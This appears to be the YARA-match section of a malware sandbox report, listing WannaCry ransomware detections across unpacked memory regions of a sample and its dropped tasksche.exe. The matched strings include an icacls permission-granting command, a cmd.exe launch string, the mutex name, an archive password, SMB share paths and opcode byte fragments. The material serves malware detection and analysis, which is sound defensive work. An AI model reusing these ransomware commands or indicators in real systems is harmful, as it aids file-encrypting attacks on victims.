0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
0.2.onq54JS79W.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.onq54JS79W.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.onq54JS79W.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.23f996c.8.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.23f996c.8.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23f996c.8.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.23f996c.8.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.onq54JS79W.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.onq54JS79W.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.onq54JS79W.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.onq54JS79W.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.23f996c.8.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.23f996c.8.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23f996c.8.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.23f996c.8.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.23d6948.6.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.23d6948.6.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
1.2.onq54JS79W.exe.23d6948.6.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23d6948.6.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.2.onq54JS79W.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.onq54JS79W.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.onq54JS79W.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.onq54JS79W.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.onq54JS79W.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.23c78c8.7.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x3136c:$x3: tasksche.exe 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.onq54JS79W.exe.23c78c8.7.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.2.onq54JS79W.exe.23c78c8.7.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23c78c8.7.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
2.2.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.2.tasksche.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
2.2.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1ea5084.5.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x285de4:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x275bb0:$x3: tasksche.exe 0x285dc0:$x3: tasksche.exe 0x285d9c:$x4: Global\MsWinZonesCacheCounterMutexA 0x285e14:$x5: WNcry@2ol7 0x17350:$x7: mssecsvc.exe 0x24026c:$x7: mssecsvc.exe 0x25bb94:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x275b88:$x8: C:\%s\qeriuwjhrf 0x285de4:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x240254:$s1: C:\%s\%s 0x25bb7c:$s1: C:\%s\%s 0x275b9c:$s1: C:\%s\%s 0x285d14:$s3: cmd.exe /c "%s" 0x2b8268:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x272ed0:$s5: \\192.168.56.20\IPC$
1.2.onq54JS79W.exe.1ea5084.5.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
2.2.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.1ea5084.5.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
